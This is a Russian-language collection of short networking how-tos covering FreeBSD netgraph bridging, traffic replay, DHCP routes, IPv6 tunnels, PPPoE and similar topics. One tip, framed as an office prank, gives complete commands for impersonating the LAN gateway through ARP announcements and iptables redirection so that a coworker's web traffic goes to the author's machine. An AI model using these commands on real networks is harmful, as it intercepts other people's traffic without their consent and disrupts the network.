проб, чтения и новых проб я решил не заниматься ремонтом ядра и этих приложений, а просто выборочно сбриджевать два сетевых интерфейса: - IGMP на multicast адреса из локалки в сеть провайдера и обратно; - UDP на multicast адреса из сети провайдера в локалку. Броадкаст не нужен, и направляется в ядро как обычно. Несмотря на цифру 2, по сути эта третья версия графа, получившая в результате оптимизации первых двух. Первая содержала ng_ether, ng_tee, ng_one2many, ng_bpf. Вторая содержала ng_ether, ng_tee, ng_one2many, ng_bpf. Окончательная содержит: ng_ether, ng_left2right, ng_tee, ng_bpf. В первых двух версиях создавалась копия пакета, и один уходил через мост в другую сеть либо отбрасывался, а второй попадал в ядро. Поскольку ядро всё равно их дропало где то внутри и нетграф их очень много отбрасывал, ничего полезного не делая, то я решил их вообще туда не посылать и организовать так чтобы не создавать дубликатов и не уничтожать пакеты. Принцип работы BPF настроен таким образом чтобы пропускать все без исключения пакеты с upper хуков ng_ether нод на lower хуки (пакеты от системы в сеть). Приходящие из сети пакеты с lower хуков нод проверяются в BPF, и - если это мультикаст; - и не броадкаст; - и IGMP [или UDP в случае если пакет от адаптера подключённого к провайдеру] то такой пакет целиком пересылается на lower хук другого адаптера, минуя сетевой стёк операционной системы. Тонкости 1. Пришлось включить promisc режим на обоих интерфейсах, иначе мультикаст дропается самим сетевым адаптером, это нормальное поведение. 2. Пришлось включить autosrc на интерфейсе в сети провайдера, так как у провайдера на коммутаторе настроен Port Security на пропускание только одного MAC адреса - первого изученного на порту после поднятия линка. 3. Моему провайдеру нет дела до того какой src-ip в IP приходит от меня, если бы было, то я бы попробовал гнать трафик в сторону провайдера через ng_patch ноду, которая бы заменяла src-ip на нужны, и выставляла CSUM_IP и CSUM_UDP в заголовке пакета - есть шанс что драйвер сетевого адаптера сам рассчитает эти суммы либо что оборудование провайдера проигнорирует неверную контрольную сумму в IGMP пакетах от меня. Нода также подключается обоими хуками к BPF, выход настраивается на passtrouth (пересылку всех пакетов) на lower хук ng_ether на адаптере в сети провайдера, а вход ng_patch должен быть match выходом от lower на адаптере в локальной сети. Те совсем не большая модификация графа. 4. Работает на vlan интерфейсах. Для создания аналогичного по функционалу моста, в котором будет несколько сетевых интерфейсов в разных сетях с мультикастом и несколько сетевых адаптеров в сетях куда его нужно переправить потребуется на каждый сетевой адаптер вешать по ng_split + ng_one2many и по одной ng_one2many с каждой стороны моста для рассылки копий мультикаста на все интерфейсы. upper хуки ng_ether нод по прежнему будут напрямую подключатся к BPF. В случае нескольких сетей - источников мультикаста будет ещё проблема с возможным перекрытием адресных пространств, которую можно частично разрешить настроив в BPF фильтрацию по адресам.

Запись и повторное проигрывание трафика [комментарии]

Для симулирования трафика, перехваченного сниффером и сохранённого в формате pcap, удобно использовать сочетание утилит tcpreplay (http://tcpreplay.synfin.net/) для непосредственной переотправки трафика и tcprewrite (http://tcpreplay.synfin.net/wiki/tcprewrite) для замены IP-адресов и других параметров пакетов. Повторная генерация потока может быть полезна для оценки поведения различных программ на различные атаки, при изучении причин сбоев в сетевом ПО или при проведении нагрузочного тестирования (можно менять интенсивность отправки пакетов). Обе утилиты входят в состав пакета tcpreplay: sudo apt-get install tcpreplay Перехват трафика можно произвести утилитой tcpdump: tcpdump -ni wlan0 -s0 -w dump.pcap port 501 Для замены адреса отправителя 210.1.54.1 на адрес локальной машины 192.168.1.1 используем утилиту tcprewrite: tcprewrite --skipbroadcast --pnat=210.1.54.1:192.168.1.1 --infile=dump.pcap --outfile=dump2.pcap Повторно генерируем пакеты, используя интерфейс eth0: tcpreplay --intf1=eth0 dump2.pcap Из других похожих проектов, можно отметить: fragroute - позволяет перехватывать, изменять и переотправлять трафик, адресованный определённому хосту. netdude - мощный редактор и просмотрщик содержимого pcap-дампов. wireplay - простая и удобная утилита для переотправки записанных в pcap-дампе TCP-сессий с внесением изменений. Например, для переотправки записанного в http.pcap HTTP-трафика: wireplay -K --role client --port 80 --target 127.0.0.1 -L -F http.pcap В ситуации, когда нужно просто сгенерировать поток на основе лога HTTP-сервера, можно использовать утилиту httperf: Копируем список запрашиваемых URL из лога: cat apache.log | awk '{print $7}' > requests.log Заменяем перевод сроки на нулевой символ, как того требует httperf tr "\n" "\0" < requests.log > httperf.log Симулируем отправку пакетов к IP 192.168.1.1 в 100 одновременных запросов, прекращаем отправку после 10 тыс. запросов. httperf --hog --server 192.168.1.1 --port 80 --wlog=n,httperf.log --rate=100

Передача статических маршрутов в DHCP (доп. ссылка 1) [комментарии]

В основную секцию файла конфигурации DHCP сервера нужно прописать: option ms-classless-static-routes code 249 = array of unsigned integer 8; option rfc3442-classless-static-routes code 121 = array of unsigned integer 8; в потом в секции subnet или host прописывать: option ms-classless-static-routes 16, 172,16, 10,16,40,100; option rfc3442-classless-static-routes 16, 172,16, 10,16,40,100; где 16 (маска) 172.16.0.0 (сеть) 10.16.40.100 (шлюз) Скрипт для генерации содержимого "option classless-route" в шестнадцатеричной нотации для более старых версий dhcpd: #!/usr/bin/perl use strict; # Usage: # make_classless_option({ "subnet/mask" => "router", "subnet/mask" => "router", ... }); # subnet the subnet address, 4 dot-separated numbers # mask the subnet mask length (e.g. /24 corresponds to 255.255.255.0, /8 corresponds to 255.0.0.0) # router the router address, 4 dot-separated numbers sub make_classless_option{ my $routes = shift; my ($s1, $s2, $s3, $s4, $len, @bytes, $net, $mask, $destination, $router); $len = 2; @bytes = (); foreach $destination(keys %{$routes}) { ($net, $mask) = split('/', $destination); $router = $routes->{$destination}; ($s1, $s2, $s3, $s4) = split(/\./, $net); push(@bytes, sprintf('%02x', $mask)); push(@bytes, sprintf('%02x', $s1)); push(@bytes, sprintf('%02x', $s2)) if($mask > 8); push(@bytes, sprintf('%02x', $s3)) if($mask > 16); push(@bytes, sprintf('%02x', $s4)) if($mask > 24); ($s1, $s2, $s3, $s4) = split(/\./, $router); push(@bytes, sprintf('%02x', $s1)); push(@bytes, sprintf('%02x', $s2)); push(@bytes, sprintf('%02x', $s3)); push(@bytes, sprintf('%02x', $s4)); } return join(':', @bytes); } # Пример использования print make_classless_option({ "10.230.0.0/16" => "10.230.178.145" });

Настройка IPv6 в Ubuntu Linux (доп. ссылка 1) Автор: pridumal.org.ua [комментарии]

Имеем Ubuntu 8.10 Intrepid Ibex Server Edition, выходящий в сеть по PPP и работающий с интранет IP через NAT. Задача: дать ему реальный, белый IPv6-адрес и сделать на его базе IPv6-маршрутизатор, который будет обеспечивать передачу IPv6-пакетов между миром и локальной сетью. Для начала получим себе адрес IPv6. В этом нам поможет сервис (т.н. "брокер") http://go6.net, на котором нам, в первую очередь, надо зарегистрироваться. Go6 даст нам не один адрес IPv6, а целую подсеть. Для того, чтобы выпустить пакеты IPv6 в мир go6 предоставит нам IPv4-туннель: пакеты шестой версии будут упакованы в пакеты четвертой версии, в таком виде через провайдерские сети дойдут до маршрутизаторов freenet6 (именно так называется сеть, к которой мы подключаемся), где их распакуют и выпустят уже в виде полноценной v6. После регистрации на указанный адрес придет письмо в котором нас интересуют поля Username, Password и Gateway6 Address. Теперь приступаем к настройке сервера. По умолчанию поддержка IPv6 в ubuntu-server уже включена. В случае чего ситуацию можно исправить командой: $ sudo modprobe ipv6 Нам понадобится установить всего лишь один единственный пакет: $ sudo apt-get install tspc После установки редактируем конфиг: $ sudo nano /etc/tsp/tspc.conf Вот вывод того, что включено у меня (результат команды sudo cat /etc/tsp/tspc.conf | grep -v "#") auth_method=any client_v4=auto userid=xxxxxx <== Тут ваш юзернейм из письма passwd=******** <== Пароль из письма template=setup server=broker.freenet6.net <== Адрес брокера retry_delay=30 tunnel_mode=v6anyv4 if_tunnel_v6v4=sit1 if_tunnel_v6udpv4=tun proxy_client=no keepalive=yes keepalive_interval=30 syslog_facility=DAEMON syslog_level=INFO host_type=router prefixlen=64 if_prefix=eth0 <== Адрес сетевой карты, которая смотрит в локалку Ок, кажется всё настроили - теперь можно проверять: $ sudo /etc/init.d/tspc restart $ ifconfig eth0 Если вы увидели там inet6 addr, начинающийся на что-то, отличное от fe... (например 2001:5с0...), значит всё получилось. Иначе - читаем и повторяем всё сначала. Еще один неплохой способ проверить - пропинговать какой-нибудь IPv6-enabled сайт. Например ipv6.google.com. Для этого, вместо "обычного" пинга, воспользуемся специальной версией для IPv6: $ ping6 ipv6.google.com PING ipv6.google.com(2001:4860:0:1001::68) 56 data bytes 64 bytes from 2001:4860:0:1001::68: icmp_seq=1 ttl=54 time=444 ms

Настройка IPv6 в Debian GNU/Linux (доп. ссылка 1) [комментарии]

IPv6 соединение будем туннелировать через брокер туннелей (Tunnel Broker), так как не все ISP поддерживают прямое IPv6 соединение. Регистрируем свою систему в сервисе http://tunnelbroker.net/ (выбираем "Create Regular Tunnel") , http://go6.net/4105/freenet.asp или http://www.sixxs.net/ При регистрации вводим IPv4 адрес машины, на которой будет поднят туннель. После регистрации получаем: IPv4 адрес удаленного конца туннеля: 216.66.80.30 IPv6 адрес удаленного шлюза: 2001:0470:1f0a:cc0::1/64 Клиентский IPv6 адрес, который нужно использовать на своей машине: 2001:0470:1f0a:cc0::2/64 Поднимаем IPv6-in-IPv4 туннель: ifconfig sit0 up ifconfig sit0 inet6 tunnel ::216.66.80.30 ifconfig sit1 up ifconfig sit1 inet6 add 2001:0470:1f0a:cc0::2/64 route -A inet6 add ::/0 dev sit1 Проверяем через пинг удаленного конца туннеля и IPv6 хоста из списка http://www.ipv6.org/v6-www.html : ping6 -c4 2001:0470:1f0a:cc0::1 ping6 -c4 www.ipv6.uni-muenster.de Создаем файл /etc/network/if-up.d/ipv6 для настройки параметров при загрузке: #!/bin/sh PATH=/sbin:/bin ifconfig sit0 up ifconfig sit0 inet6 tunnel ::216.66.80.30 ifconfig sit1 up ifconfig sit1 inet6 add 2001:0470:1f0a:cc0::2/64 route -A inet6 add ::/0 dev sit1 Не забываем поставить права доступа: chmod 755 /etc/network/if-up.d/ipv6

Подключение FreeBSD к IPv6 - поднимаем туннель через IPv4-сети провайдера (доп. ссылка 1) Автор: Litos [комментарии]

Итак, пришло время поднять IPv4-IPv6 gateway, чтобы ходить в мир "другого интернета", коим он скоро будет. Самым простым способом получить IPv6 адрес оказалось получить подключение от http://go6.net Идем на этот сайт и регистрируемся http://go6.net/4105/register.asp Тут же они предлагают скачать софт и поставить, например для Windows вида "скачай и запусти" http://go6.net/4105/download.asp Но это не совсем наш метод, мы будем подключать сервер на FreeBSD 7.0 к этой сети. Ядро у нас собрано с поддержкой IPV6, т.е. с options INET6 (ядро GENERIC уже поддерживает этот протокол и если вы его не отключали, значит, он у вас есть) Итак, ставим клиента, то, что они предлагают скачивать - есть в портах Port: gateway6-5.0_2 Path: /usr/ports/net/gateway6 Info: Gateway6 Tunnel Setup Protocol Client - Free IPv6 tunnel B-deps: R-deps: WWW: http://www.go6.net/ Приступаем к установке: cd /usr/ports/net/gateway6 make install clean Буквально через несколько минут клиент будет установлен Отредактируйте его конфигурационный файл /usr/local/etc/gw6c.conf userid= passwd= Пропишите туда ваше имя и пароль которые указали при регистрации на сайте. На этом начальная настройка закончена, для дальнейшей настройки читайте документацию. Как я понял, выдается целая сеть и для авторизованных пользователей http://go6.net/4105/freenet.asp, тем самым можно все компьютеры дома подключить на реальные статические IPv6 адреса. server=broker.freenet6.net broker.freenet6.net - это имя сервера для подключения (написано в письме при регистрации) # Включить использование авторизации auth_method=any # Писать логи в syslogd log_syslog=3 Теперь осталось запустить его echo 'gateway6_enable="YES"' >> /etc/rc.conf /usr/local/etc/rc.d/gateway6 start И смотрим # tail -f /var/log/messages Oct 17 18:39:38 lola gw6c: Gateway6 Client v5.0-RELEASE build Oct 17 2008-14:56:32 Oct 17 18:39:38 lola gw6c: Establishing connection to tunnel broker broker.freenet6.net using reliable UDP. Oct 17 18:39:42 lola gw6c: Connection to broker.freenet6.net established. Oct 17 18:39:45 lola gw6c: Authentication success. Oct 17 18:39:45 lola gw6c: Got tunnel parameters from server. Setting up local tunnel. Oct 17 18:39:45 lola gw6c: Executing configuration script: /bin/sh "/usr/local/share/gateway6/freebsd.sh". Oct 17 18:39:46 lola gw6c: Script completed successfully. Oct 17 18:39:46 lola gw6c: Your IPv6 address is 2001:05c0:8fff:fffe:0000:0000:0000:c243. Oct 17 18:39:46 lola gw6c: The tunnel type is v6udpv4. # ifconfig tun1: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> metric 0 mtu 1280 inet6 2001:5c0:8fff:fffe::c243 --> 2001:5c0:8fff:fffe::c242 prefixlen 128 Opened by PID 873 # traceroute6 www.jp.freebsd.org ... # ping6 www.jp.freebsd.org ... Все прекрасно работает не смотря на то, что выход осуществляется в мир через NAT на модеме. Итак, осталось только понять, "зачем это надо", но ясно одно - за этим будущее. А еще можно посмотреть на танцующую черепаху на http://www.kame.net/ :-) Также рекомендую прочитать документацию (главу в HandBook http://www.freebsd.org/doc/ru_RU.KOI8-R/books/handbook/network-ipv6.html) по поддержке протокола IPv6 в системе FreeBSD.

Пример настройки ng_neflow для нескольких интерфейсов. Автор: stalex [комментарии]

#cat ng5_netflow.sh #!/bin/sh kldload ng_netflow kldload ng_ether kldload ng_tee kldload ng_one2many /usr/sbin/ngctl -f- <<-SEQ mkpeer em2: tee lower right connect em2: em2:lower upper left name em2:lower em2_tee mkpeer em2:lower netflow right2left iface0 name em2:lower.right2left netflow msg netflow: setifindex { iface=0 index=1 } connect em2:lower netflow: left2right iface1 msg netflow: setifindex { iface=1 index=1 } mkpeer vlan254: tee lower right connect vlan254: vlan254:lower upper left name vlan254:lower vlan254_tee connect vlan254:lower netflow: right2left iface3 msg netflow: setifindex { iface=3 index=1 } connect vlan254:lower netflow: left2right iface4 msg netflow: setifindex { iface=4 index=1 } mkpeer vlan22: tee lower right connect vlan22: vlan22:lower upper left name vlan22:lower vlan22_tee connect vlan22:lower netflow: right2left iface5 msg netflow: setifindex { iface=5 index=1 } connect vlan22:lower netflow: left2right iface6 msg netflow: setifindex { iface=6 index=1 } mkpeer vlan21: tee lower right connect vlan21: vlan21:lower upper left name vlan21:lower vlan21_tee connect vlan21:lower netflow: right2left iface7 msg netflow: setifindex { iface=7 index=1 } connect vlan21:lower netflow: left2right iface8 msg netflow: setifindex { iface=8 index=1 } mkpeer netflow: ksocket export inet/dgram/udp msg netflow:export connect inet/127.0.0.1:20001 SEQ

Прозрачный редирект порта, используя xinetd и netcat (доп. ссылка 1) [комментарии]

После переноса сервиса на новый сервер, на старом можно организовать сервис заглушку, осуществляющий редирект следующим образом: /etc/xinetd.d/smtp-tcp service smtp { disable = no socket_type = stream protocol = tcp user = nobody wait = no server = /bin/nc # server = /usr/bin/netcat server_args = -w 2 192.168.1.1 25 } где 192.168.1.1 адрес нового сервера, nc - утилита netcat, "-w 2" - таймаут в 2 сек.

Изменение имени сетевого интерфейса в Linux Автор: NuclearCat [комментарии]

/sbin/ifconfig ppp1 down /sbin/ip link set ppp1 name my_ppp /sbin/ifconfig my_ppp up

Статические маршруты через isc-dhcpd Автор: Артем Бохан [комментарии]

Согласно RFC 3442 через dhcp можно отдавать таблицу маршрутизации. Изначально эта опция не поддерживается isc-dhcpd, но опцию можно добавить. Пример: option classless-route code 121 = string; option classless-route 18:c0:a8:ea:c0:a8:00:05; пример получения кода, взято с http://rfc3442svc.sourceforge.net/isc-dhcpd-configuration.html #!/usr/bin/perl use strict; # Usage: # make_classless_option({ "subnet/mask" => "router", "subnet/mask" => "router", ... }); # subnet the subnet address, 4 dot-separated numbers # mask the subnet mask length (e.g. /24 corresponds to 255.255.255.0, /8 corresponds to 255.0.0.0) # router the router address, 4 dot-separated numbers sub make_classless_option { my $routes = shift; my ($s1, $s2, $s3, $s4, $len, @bytes, $net, $mask, $destination, $router); $len = 2; @bytes = (); foreach $destination(keys %{$routes}) { ($net, $mask) = split('/', $destination); $router = $routes->{$destination}; ($s1, $s2, $s3, $s4) = split(/\./, $net); push(@bytes, sprintf('%02x', $mask)); push(@bytes, sprintf('%02x', $s1)); push(@bytes, sprintf('%02x', $s2)) if($mask > 8); push(@bytes, sprintf('%02x', $s3)) if($mask > 16); push(@bytes, sprintf('%02x', $s4)) if($mask > 24); ($s1, $s2, $s3, $s4) = split(/\./, $router); push(@bytes, sprintf('%02x', $s1)); push(@bytes, sprintf('%02x', $s2)); push(@bytes, sprintf('%02x', $s3)); push(@bytes, sprintf('%02x', $s4)); } return join(':', @bytes); } # Sample usage print make_classless_option({ "172.16.0.0/12" => "10.0.0.1", "10.0.0.0/8" => "10.0.0.1", "0.0.0.0/0" => "192.168.0.1", "192.168.234.0/24" => "192.168.0.5" }); На данный момент данную опцию поддерживает малое количество клиентов, например windows XP, только по непонятным причинам использует код 249, т.е. в конфигурации сервера надо будет использовать option classless-route code 249 = string;

Настройка беспроводной 80211 карты под FreeBSD (доп. ссылка 1) Автор: toxa [комментарии]

kldload bridge sysctl net.link.ether.bridge.enable="1" sysctl net.link.ether.bridge.config="wi0,fxp0" sysctl net.inet.ip.forwarding="1" ifconfig wi0 ssid toxawlan channel 11 media DS/11Mbps mediaopt hostap up stationname "toxawlan"

Обобщение используемых моделей ввода/вывода (доп. ссылка 1) [обсудить]

Стратегии организации ввода-вывода:

Блокируемый I/O - после вызова read/write происходит блокировка до завершения операции, функция завершается только после принятия или передачи блока данных.
Неблокируемый I/0 - функция завершается сразу, если данные не были приняты/отправлены возвращается код ошибки (т.е. нужно вызывать функции I/O в цикле пока не получим положительный результат).
Мультиплексирование через select/poll - опрашиваем список состояния сокетов, перебирая состояния определяем сокеты готовые для приема/передачи. Главный минус - затраты на перебор, особенно при большом числе неактивных сокетов.

select - число контролируемых сокетов ограничено лимитом FD_SETSIZE, в некоторых случаях лимит обходится пересборкой программы, в других - пересборкой ядра ОС.
poll - нет лимита FD_SETSIZE, но менее эффективен из за большего размера передаваемой в ядро структуры.

Генерация сигнала SIGIO при изменении состояния сокета (ошибка, есть данные для приема, или отправка завершена), который обрабатывает обработчик SIGIO. В классическом виде применение ограничено и трудоемко, подходит больше для UDP.
Асинхронный I/O - описан в POSIX 1003.1b (aio_open, aio_write, aio_read...), функция aio_* завершается мгновенно, далее процесс сигнализируется о полном завершении операции ввода/вывода (в предыдущих пунктах процесс информировался о готовности прочитать или передать данные, т.е. данные еще нужно было принять или отправить через read/write, в aio_* процесс сигнализируется когда данные полностью получены и скопированы в локальный буфер).
Передача данных об изменении состояния сокета через генерацию событий. (специфичные для определенных ОС решения, малопереносимы, но эффективны).

kqueue - лучшее для FreeBSD, NetBSD. Данные о нескольких событиях могут быть переданы за раз, очень гибкое решение.
/dev/epoll - лучшее для 2.6 Linux ядра, передача нескольких событий за раз, трудоемкость поддержки /dev/epoll если параллельно в программе поддерживаются другие механизмы нотификации.
Realtime Signals (F_SETSIG) - лучшее для 2.4 Linux ядра.
/dev/poll - имеет смысл в Solaris, в Linux реализация недостаточно хороша.
Ссылки:

libevent - очень хорошая библиотека враппер для работы с kqueue, select, poll, epoll и real-time signals.
kqueue - a generic and scalable event notification facility
man kqueue
Слайды "The kqueue facility in FreeBSD"
/dev/epoll - a highspeed Linux kernel patch
Improving (network) I/O performance - описание /dev/epoll с примерами кода, неплохое сравнение с poll(), realtime signals и /dev/poll.
signal-per-fd" Linux kernel patch
Analysis of RealTime Signals for Highly Concurrent Network I/O
Using the devpoll (/dev/poll) Interface Using the select() and poll() methods
Главная ссылка к новости

The C10K problem - отличное собрание информации по стратегиям ввода/вывода

ru.unix.prog FAQ - Некоторые методы получения состояния (активности) сокета

High-Performance Server Architecture

Сравнение производительности poll, kqueue и /dev/poll

Сравнение производительности poll() и realtime signals

Краткое введение в kqueue/kevent (rus);

tcpdump для просмотра содержимого пакетов по определенным портам. (доп. ссылка 1) [комментарии]

tcpdump -X -s 1500 -n -i fxp0 (tcp port 443) or (tcp port 994) Если нужно выбрать трафик в котором не фигурируют IP 1.2.3.190 и 192.168.20.254, а также внутренние пересылки между адресами 192.168.20 сети, можно использовать правило фильтрации: not host 1.2.3.190 and not host 192.168.20.254 and not (dst net 192.168.20.0/24 and src net 192.168.20.0/24)

Как в FreeBSD добавить/убрать алиас для сетевого интерфейса [комментарии]

Добавить: ifconfig fxp0 inet 192.168.1.1 netmask 255.255.255.255 alias Убрать: ifconfig fxp0 inet 192.168.1.1 netmask 255.255.255.255 -alias

Табличка с сетевыми масками. (доп. ссылка 1) [комментарии]

адресов в подсети, 255.255.255.x маска, /x маска, .0 - cisco acl маска. 0 .255 /32 .0 2 .254 /31 .1 4 .252 /30 .3 8 .248 /29 .7 16 .240 /28 .15 32 .224 /27 .31 64 .192 /26 .63 128 .128 /25 .127 256 .0 /24 .255

Ethernet, ARP, привязка MAC адресов.

Пробуждение компьютера по сети с помощью D-Link DIR 300 (320) NRU Автор: jPump [комментарии]

Задача: Осуществить возможность пробуждения (Wake on Lan) из интернета удаленного компьютера, находящегося дома за роутером марки D-Link (DIR-300, DIR-320). Решение: Использование команды ip, имеющейся в стандартных сборках BusyBox'a в роутерах D-Link. Предисловие: Дома стоит роутер D-Link DIR-320/NRU ревизии B1, а до этого был DIR-300/NRU ревизии B5, для которых (на данный момент) нет альтернативных готовых прошивок (в том числе и горячо всеми любимой DD-WRT). На роутере стоит BusyBox 1.12. Проблема состояла в том, что встроенное в веб-интерфейс средство переброса пакетов не позволяют переадресацию в широковещательный канал - broadcast (x.x.x.255), а хитровыделанный D-Link обновляет arp-таблицу каждые 15-30 секунд, так что непосредственно в выключенный длительное время компьютер Magic Packet тоже не перебросить. Тайваньские ребята решили отказаться от компиляции arp, sudo и прочих печенюшек в BusyBox, поскольку iptables тоже не позволяет POSTROUTING на широковещательный канал. Решение после недели напряженного поиска было найдено случайно на ныне почившем форуме сборки линукса для старых компьютеров под роутер. Пример: Для начала настройте BIOS вашей материнской платы (в разделе настроек питания есть пункт о пробуждении из выключенного состояния) и вашей сетевой карты (уже из операционной системы в свойствах карты). Для проверки выключите компьютер и посмотрите, если индикация сетевого разъема мигает, значит все в порядке. 1. Подключаемся telnet-ом к роутеру (логин и пароль те же, что и для веб-интерфейса): Dlink-Router login: admin Password: Welcome to _______ ___ __ ____ _ _ ___ | ___ \\ | | |__|| \\ | || | / / | | | || ___ | |__ __ | \\| || |/ / | |___| || |___| | || || |\\ || \\ |_______/ |______||__||_| \\____||_|\\___\\ = Ebuilding Networks for People = BusyBox v1.12.1 (2011-05-13 14:42:48 MSD) built-in shell (ash) Enter 'help' for a list of built-in commands. # 2. Если компьютер в данный момент присоединен к роутеру, то ищем его mac-адрес, набираем: # ip neigh show <Внешний_ip> dev eth2.5 lladdr 01:23:45:67:AB:CD DELAY ! Внешний адрес 192.168.0.50 dev br0 lladdr 11:22:33:44:55:66 REACHABLE ! Настольный компьютер 192.168.0.90 dev br0 lladdr 77:88:99:00:AA:BB REACHABLE ! Ноутбук 3. Поскольку в данный момент уже уже есть запись для нашего mac-адреса, то мы не добавляем, а просто изменяем текущую: # ip neigh change 192.168.0.50 lladdr 11:22:33:44:55:66 nud permanent dev br0 4. Смотрим результат, снова набираем: # ip neigh show <Внешний_ip> dev eth2.5 lladdr 01:23:45:67:AB:CD DELAY ! Внешний адрес 192.168.0.50 dev br0 lladdr 11:22:33:44:55:66 PERMANENT ! Настольный компьютер 192.168.0.90 dev br0 lladdr 77:88:99:00:AA:BB REACHABLE ! Ноутбук После этого уже заходим на веб-интерфейс нашего роутера и в разделе "межсетевой экран" в пункте "Виртуальные серверы" добавляем проброс 9 (или 7, в зависимости от вашей сетевой карты) порта роутера на порт ip вашего компьютера. Послесловие: Совет: настройте через веб-интрефейс роутера DHCP для mac'а вашего компьютера статический IP (по умолчанию DIR-300(320)/NRU выдает их в диапазоне от 192.168.0.2 - 192.168.0.100) Дополнительные ссылки:
Немного о линуксовых командах в пределах BusyBox: http://noted.org.ua/1727
Чуть подробнее про команду ip: http://linux-ip.net/html/tools-ip-neighbor.html
Для проверки работоспособности можно воспользоваться сайтом: http://wakeonlan.me/
Особая благодарность русскоязычному форуму D-Link'a, оказавшую неоценимую помощь и моральную поддержку: 1, 2, 3

Подстановка HTTP-трафика определенному компьютеру в локальной сети (доп. ссылка 1) [комментарии]

Используя нехитрые манипуляции в Linux можно подшутить или удивить соседа по офису, например отобразив персональное поздравление при попытке открыть соседом какой-нибудь известного ресурса. Манипуляции проделываются без изменения конфигурации шлюза, путем поднятия web-сервера на своей машине и перенаправление на него запросов, через подмену ARP-адреса шлюза в кэше на машине соседа. Техника действует только в пределах локальной сети. Включаем на своей машине перенаправление IP-пакетов: echo 1 > /proc/sys/net/ipv4/ip_forward Перенаправляем запросы на 80-порт, заменив адрес назначения в пакете на 192.168.1.200 - локальный IP машины с подставным шлюзом. На локальной машине должен быть заблаговременно поднят http-сервер с нужной страницей. iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200 Добавляем адрес реального шлюза (192.168.1.1) на сетевой интерфейс: ip addr add 192.168.1.1/24 dev eth0 Анонсируем смену MAC-адреса шлюза: arping -c 3 -A -I eth0 192.168.1.1 После завершения розыгрыша убираем IP шлюза с локального интерфейса: ip addr delete 192.168.1.1/24 dev eth0 iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200 ifconfig eth0 down ifconfig eth0 up arp -d 192.168.1.1 Внимание, описанное действие не следует применять в рабочей сети предприятия, так как подстановка шлюза на время блокирует работу сети из-за конфликта с реальным шлюзом.

Настройка PPPoE соединения в Debian/Ubuntu Linux (доп. ссылка 1) Автор: Сергей Афонькин [комментарии]

В данной заметке пойдет речь о частном случае настройки PPPoE - когда необходимо установить соединение на определенный PPPoE концентратор (в том случае когда в сети имеется несколько концентраторов), без использования графических утилит. Для начала установим необходимые пакеты: sudo aptitude install pppoe ppp Далее выполним поиск имеющихся PPPoE концентраторов в сети: sudo pppoe-discovery Access-Concentrator: ac1 Got a cookie: 00 b0 f3 f8 77 fb 26 64 c8 5e 48 80 42 2e 5b a3 AC-Ethernet-Address: 88:43:e1:36:d9:00 Access-Concentrator: ac2 Got a cookie: c2 9c 3c db 26 06 89 f6 06 7e a0 06 ff 8a f8 17 9a 07 00 00 AC-Ethernet-Address: d8:d3:85:e3:85:75 ... В моем случае видим два концентратора с именами ac1 и ac2. Предположим, что необходимо постоянно подключаться к концентратору ac2. Как это сделать? Создаем файл /etc/ppp/peers/pppoe, следующего содержания: ipcp-accept-local ipcp-accept-remote lcp-echo-interval 30 lcp-echo-failure 5 noipdefault usepeerdns defaultroute replacedefaultroute noccp noaccomp noauth persist mtu 1492 hide-password connect /bin/true pty "pppoe -I eth0 -C ac2" # <-- Тут имя вашего концентратора user ПОЛЬЗОВАТЕЛЬ # <-- Тут ваш логин password ПАРОЛЬ # <-- Тут ваш пароль После создания файла можно пробовать устанавливать соединение, выполнив в командной строке: sudo pon pppoe Смотрим наличие интерфейса ppp0 в выводе команды ifconfig. Вывод команды приблизительно такой: sudo ifconfig ppp0 Link encap:Point-to-Point Protocol inet addr:172.22.51.19 P-t-P:94.70.254.21 Mask:255.255.255.255 UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1472 Metric:1 RX packets:29890 errors:0 dropped:0 overruns:0 frame:0 TX packets:26304 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 RX bytes:17850149 (17.0 MiB) TX bytes:1835091 (1.7 MiB) ... Если интерфейса ppp0 в выводе команды ifconfig нет, смотрим логи: sudo plog или sudo grep ppp /var/log/syslog Для автоматического создания PPPoE подключения при загрузке компьютера можно прописать следующие строки в /etc/network/interfaces: auto ppp0 iface ppp0 inet ppp pre-up /sbin/ifconfig eth0 up provider pppoe Для отключения соединения PPPoE достаточно выполнить следующую команду: sudo poff pppoe Если PPPoE соединение используется для организации сервиса NAT в сети, то машины за этим NATом должны иметь MTU равный 1412. Иначе возможна ситуация когда, например, некоторые www ресурсы будут недоступны пользователям за NATом. Чтобы этого избежать можно "выравнивать" MTU при помощи iptables. Загрузку правила для iptables сделаем автоматически, при установке PPPoE соединения. А при отключении соединения будем удалять это правило из iptables. Для этого создадим два файла. Для загрузки правила создадим файл /etc/ppp/ip-up.d/pppoemtu следующего содержания: #! /bin/sh PATH=/sbin:/bin:/usr/bin set -e if [ -n "$PPP_IFACE" ]; then iptables -t mangle -o "$PPP_IFACE" --insert FORWARD 1 -p tcp \ --tcp-flags SYN,RST SYN -m tcpmss --mss 1400:1536 -j TCPMSS --clamp-mss-to-pmtu fi Для удаления правила создадим файл /etc/ppp/ip-down.d/pppoemtu следующего содержания: #! /bin/sh PATH=/sbin:/bin:/usr/bin set -e if [ -n "$PPP_IFACE" ]; then iptables -t mangle -L -n -v --line-numbers | \ grep "TCPMSS.*$PPP_IFACE.*clamp" | cut -f1 -d " " | sort -r | xargs -n1 -r iptables -t mangle -D FORWARD fi Чтобы правила работали надо сделать файлы исполняемыми: sudo chmod 755 /etc/ppp/ip-up.d/pppoemtu /etc/ppp/ip-down.d/pppoemtu Проверить наличие правила в iptables после установки соединения можно выполнив следующую команду: sudo iptables -L -n -v -t mangle Если нет необходимости использовать определенный PPPoE концентратор, то надо просто в файле /etc/ppp/peers/pppoe заменить строку pty "pppoe -I eth0 -C ac2" на pty "pppoe -I eth0".

Объединение сетeвых интерфейсов в Ubuntu Linux при помощи "bonding" (доп. ссылка 1) Автор: Stepanoff [комментарии]

